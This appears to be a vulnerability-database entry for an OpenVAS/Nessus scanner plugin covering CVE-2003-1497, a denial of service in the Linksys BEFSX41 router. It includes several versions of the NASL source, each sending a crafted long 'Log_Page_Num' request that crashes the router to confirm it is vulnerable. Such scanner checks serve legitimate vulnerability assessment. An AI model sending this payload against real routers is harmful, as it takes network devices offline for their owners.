ID OPENVAS:11891 Type openvas Reporter This script is Copyright (C) 2003 Matt North Modified 2017-05-01T00:00:00
Description
The remote host seems to be a Linksys EtherFast Cable Firewall/Router.
This product is vulnerable to a remote Denial of service attack : if logging
is enabled, an attacker can specify a long URL which results in the router
becoming unresponsive.
# OpenVAS Vulnerability Test
# $Id: linksys_dos.nasl 6053 2017-05-01 09:02:51Z teissa $
# Description: LinkSys EtherFast Router Denial of Service Attack
#
# Authors:
# Matt North
#
# Copyright:
# Copyright (C) 2003 Matt North
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
tag_summary = "The remote host seems to be a Linksys EtherFast Cable Firewall/Router.
This product is vulnerable to a remote Denial of service attack : if logging
is enabled, an attacker can specify a long URL which results in the router
becoming unresponsive.";
tag_solution = "Update firmware to version 1.45.3
http://www.linksys.com/download/firmware.asp?fwid=172.
Risk: High";
# Linksys EtherFast Cable/DSL Firewall Router
# BEFSX41 (Firmware 1.44.3) DoS
if(description)
{
script_id(11891);
script_version("$Revision: 6053 $");
script_tag(name:"last_modification", value:"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"6.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:S/C:N/I:N/A:C");
script_cve_id("CVE-2003-1497");
script_bugtraq_id(8834);
name = "LinkSys EtherFast Router Denial of Service Attack";
script_name(name);
summary = "URL results in DoS of Linksys router";
script_category(ACT_DENIAL);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("This script is Copyright (C) 2003 Matt North");
family = "Denial of Service";
script_family(family);
script_dependencies("gb_get_http_banner.nasl");
script_mandatory_keys("linksys/banner");
script_require_ports("Services/www", 80);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_xref(name : "URL" , value : "http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html");
exit(0);
}
include("http_func.inc");
port = get_http_port(default:80);
if(http_is_dead(port:port))exit(0);
banner = get_http_banner(port:port);
if(!banner)exit(0);
if("linksys" >!< banner)exit(0);
soc = open_sock_tcp(port);
if(!soc) exit(0);
req = http_get(port: port, item: "/Group.cgi?Log_Page_Num=1111111111&LogClear=0");
send(socket: soc , data: req);
close(soc);
alive = open_sock_tcp(port);
if (!alive) security_message(port);
{"id": "OPENVAS:11891", "type": "openvas", "bulletinFamily": "scanner", "title": "LinkSys EtherFast Router Denial of Service Attack", "description": "The remote host seems to be a Linksys EtherFast Cable Firewall/Router.\n\nThis product is vulnerable to a remote Denial of service attack : if logging \nis enabled, an attacker can specify a long URL which results in the router \nbecoming unresponsive.", "published": "2005-11-03T00:00:00", "modified": "2017-05-01T00:00:00", "cvss": {"score": 6.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=11891", "reporter": "This script is Copyright (C) 2003 Matt North", "references": ["http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html"], "cvelist": ["CVE-2003-1497"], "lastseen": "2017-07-02T21:10:06", "viewCount": 2, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2017-07-02T21:10:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1497"]}, {"type": "nessus", "idList": ["LINKSYS_DOS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231011891"]}], "modified": "2017-07-02T21:10:06", "rev": 2}, "vulnersScore": 5.6}, "pluginID": "11891", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: linksys_dos.nasl 6053 2017-05-01 09:02:51Z teissa $\n# Description: LinkSys EtherFast Router Denial of Service Attack\n#\n# Authors:\n# Matt North\n#\n# Copyright:\n# Copyright (C) 2003 Matt North\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote host seems to be a Linksys EtherFast Cable Firewall/Router.\n\nThis product is vulnerable to a remote Denial of service attack : if logging \nis enabled, an attacker can specify a long URL which results in the router \nbecoming unresponsive.\";\n\ntag_solution = \"Update firmware to version 1.45.3\n http://www.linksys.com/download/firmware.asp?fwid=172.\n\nRisk: High\";\n\n\n# Linksys EtherFast Cable/DSL Firewall Router\n# BEFSX41 (Firmware 1.44.3) DoS\n\nif(description)\n{\n script_id(11891);\n script_version(\"$Revision: 6053 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"6.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2003-1497\");\n script_bugtraq_id(8834);\n\n name = \"LinkSys EtherFast Router Denial of Service Attack\";\n script_name(name);\n\n\n\n summary = \"URL results in DoS of Linksys router\";\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"This script is Copyright (C) 2003 Matt North\");\n\n family = \"Denial of Service\";\n script_family(family);\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"linksys/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\n\nport = get_http_port(default:80);\n\nif(http_is_dead(port:port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner)exit(0);\nif(\"linksys\" >!< banner)exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc) exit(0);\n\n\nreq = http_get(port: port, item: \"/Group.cgi?Log_Page_Num=1111111111&LogClear=0\");\nsend(socket: soc , data: req);\nclose(soc);\nalive = open_sock_tcp(port);\nif (!alive) security_message(port);\n", "naslFamily": "Denial of Service"}
{"cve": [{"lastseen": "2021-02-02T05:22:10", "description": "Buffer overflow in the system log viewer of Linksys BEFSX41 1.44.3 allows remote attackers to cause a denial of service via an HTTP request with a long Log_Page_Num variable.", "edition": 4, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1497", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.3, "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1497"], "modified": "2017-07-29T01:29:00", "cpe": ["cpe:/h:linksys:befsx41:1.43.3"], "id": "CVE-2003-1497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1497", "cvss": {"score": 6.3, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:h:linksys:befsx41:1.43.3:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:08:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-1497"], "description": "The remote host seems to be a Linksys EtherFast Cable Firewall/Router.\n\n This product is vulnerable to a remote Denial of service attack : if logging\n is enabled, an attacker can specify a long URL which results in the router\n becoming unresponsive.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011891", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011891", "type": "openvas", "title": "LinkSys EtherFast Router Denial of Service Attack", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# LinkSys EtherFast Router Denial of Service Attack\n#\n# Authors:\n# Matt North\n#\n# Copyright:\n# Copyright (C) 2003 Matt North\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# Linksys EtherFast Cable/DSL Firewall Router\n# BEFSX41 (Firmware 1.44.3) DoS\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11891\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"6.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2003-1497\");\n script_bugtraq_id(8834);\n script_name(\"LinkSys EtherFast Router Denial of Service Attack\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2003 Matt North\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"linksys/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html\");\n script_xref(name:\"URL\", value:\"http://www.linksys.com/download/firmware.asp?fwid=172\");\n\n script_tag(name:\"solution\", value:\"Update firmware to version 1.45.3.\");\n\n script_tag(name:\"summary\", value:\"The remote host seems to be a Linksys EtherFast Cable Firewall/Router.\n\n This product is vulnerable to a remote Denial of service attack : if logging\n is enabled, an attacker can specify a long URL which results in the router\n becoming unresponsive.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nif(http_is_dead(port:port)) exit(0);\n\nbanner = http_get_remote_headers(port:port);\nif(! banner || \"linksys\" >!< banner) exit(0);\n\nreq = http_get(port: port, item: \"/Group.cgi?Log_Page_Num=1111111111&LogClear=0\");\nhttp_send_recv(port: port, data: req);\n\nalive = open_sock_tcp(port);\nif (!alive) security_message(port:port);\n", "cvss": {"score": 6.3, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2020-06-16T02:36:07", "description": "The remote host seems to be a Linksys EtherFast Cable Firewall/Router.\n\nThis product is vulnerable to a remote denial of service attack : if\nlogging is enabled, an attacker can specify a long URL which results\nin the router becoming unresponsive.", "edition": 18, "published": "2003-10-16T00:00:00", "title": "Linksys BEFSX41 System Log Viewer Log_Page_Num Variable Overflow DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-1497"], "modified": "2003-10-16T00:00:00", "cpe": ["cpe:/h:linksys:linksys:befsx41:1.43.3"], "id": "LINKSYS_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/11891", "sourceData": "#\n# Linksys EtherFast Cable/DSL Firewall Router\n# BEFSX41 (Firmware 1.44.3) DoS\n#\n# Changes by Tenable:\n# - Revised plugin title, changed family (1/21/2009)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11891);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2003-1497\");\n script_bugtraq_id(8834);\n\n script_name(english:\"Linksys BEFSX41 System Log Viewer Log_Page_Num Variable Overflow DoS\");\n script_summary(english:\"URL results in DoS of Linksys router\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is vulnerable to a denial of service attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host seems to be a Linksys EtherFast Cable Firewall/Router.\n\nThis product is vulnerable to a remote denial of service attack : if\nlogging is enabled, an attacker can specify a long URL which results\nin the router becoming unresponsive.\");\n # http://web.archive.org/web/20031110012408/http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9f768be\");\n script_set_attribute(attribute:\"solution\", value:\"Update firmware to version 1.45.3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/10/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:linksys:linksys:befsx41:1.43.3\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2003-2020 Matt North\");\n\n script_family(english:\"CISCO\");\n\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_http_port(default:80, embedded:TRUE);\n\nif(http_is_dead(port:port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner)exit(0);\nif(\"linksys\" >!< banner)exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc) exit(0);\n\n\nreq = http_get(port: port, item: \"/Group.cgi?Log_Page_Num=1111111111&LogClear=0\");\nsend(socket: soc , data: req);\nclose(soc);\nalive = open_sock_tcp(port);\nif (!alive) security_warning(port);\n", "cvss": {"score": 6.3, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C"}}]}
